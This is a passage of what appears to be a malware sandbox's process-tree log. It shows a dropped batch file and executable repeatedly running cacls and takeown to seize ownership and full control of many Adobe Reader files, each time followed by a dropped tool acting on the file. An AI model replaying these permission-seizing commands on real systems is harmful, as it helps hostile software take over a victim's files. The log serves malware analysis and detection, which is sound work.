- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  - Loads dropped DLL
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    PID:236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:224
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1560
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  - Loads dropped DLL
  PID:1804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "brt.hyp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1096
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "brt.hyp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1984
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  - Loads dropped DLL
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    - Modifies file permissions
    PID:1232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1136
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  - Loads dropped DLL
  PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1512
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:600
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  - Loads dropped DLL
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "eng32.clx" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1560
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "eng32.clx" -nobanner
      4⤵
      Executes dropped EXE
      PID:224
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  - Loads dropped DLL
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    3⤵
    - Modifies file permissions
    PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CENTEURO.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CENTEURO.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:1096
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""
  2⤵
  - Loads dropped DLL
  PID:1804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "UKRAINE.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1136
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "UKRAINE.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:1276
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:600
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1512
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    PID:840
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      PID:976
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    PID:708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "brt32.clx" -nobanner
    3⤵
    PID:640
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "brt32.clx" -nobanner
      4⤵
      PID:1856
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  PID:808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    PID:1164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "usa.fca" -nobanner
      4⤵
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    PID:1772
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      PID:840
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:1192
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      PID:1204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:976
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    - Modifies file permissions
    PID:556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "pmd.cer" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "pmd.cer" -nobanner
      4⤵
      PID:640
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  PID:808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    PID:228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "pdf.gif" -nobanner
    3⤵
    PID:840
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "pdf.gif" -nobanner
      4⤵
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  2⤵
  PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "server_issue.gif" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "server_issue.gif" -nobanner
      4⤵
      PID:976
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:1724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:640
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1856
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    - Modifies file permissions
    PID:236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  PID:1236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    - Modifies file permissions
    PID:204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    PID:1772
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      PID:840
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  2⤵
  PID:808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    3⤵
    PID:976
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
      4⤵
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    - Modifies file permissions
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "can32.clx" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "can32.clx" -nobanner
      4⤵
      PID:640
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""
  2⤵
  PID:1376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"
    3⤵
    PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "AUMProduct.cer" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "AUMProduct.cer" -nobanner
      4⤵
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
